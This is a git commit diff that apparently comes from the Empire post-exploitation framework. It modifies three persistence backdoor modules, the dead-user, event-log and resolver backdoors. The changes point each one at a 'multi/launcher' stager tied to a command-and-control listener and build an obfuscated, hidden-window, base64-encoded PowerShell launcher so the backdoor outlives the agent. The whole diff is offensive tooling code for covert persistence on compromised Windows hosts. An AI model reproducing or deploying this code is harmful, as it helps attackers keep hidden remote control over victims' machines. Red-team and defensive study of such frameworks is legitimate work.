Fix powerbreach modules

websockets-multiuser
xorrior 2017-09-20 16:22:04 -04:00
parent 086df98ed9
commit b1c359e4b9
3 changed files with 10 additions and 6 deletions

View File

@ -149,7 +149,7 @@ Invoke-DeadUserBackdoor"""
else:
# set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["launcher"]
stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False"
@ -188,7 +188,8 @@ Invoke-DeadUserBackdoor"""
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
launcher = helpers.powershell_launcher(script)
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ")

View File

@ -1,5 +1,6 @@
import os
from lib.common import helpers
import pdb
class Module:
@ -123,7 +124,7 @@ Invoke-EventLogBackdoor"""
else:
# set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["launcher"]
stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False"
@ -162,7 +163,8 @@ Invoke-EventLogBackdoor"""
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
launcher = helpers.powershell_launcher(script)
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ")

View File

@ -136,7 +136,7 @@ Invoke-ResolverBackdoor"""
else:
# set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["launcher"]
stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False"
@ -175,7 +175,8 @@ Invoke-ResolverBackdoor"""
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
launcher = helpers.powershell_launcher(script)
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ")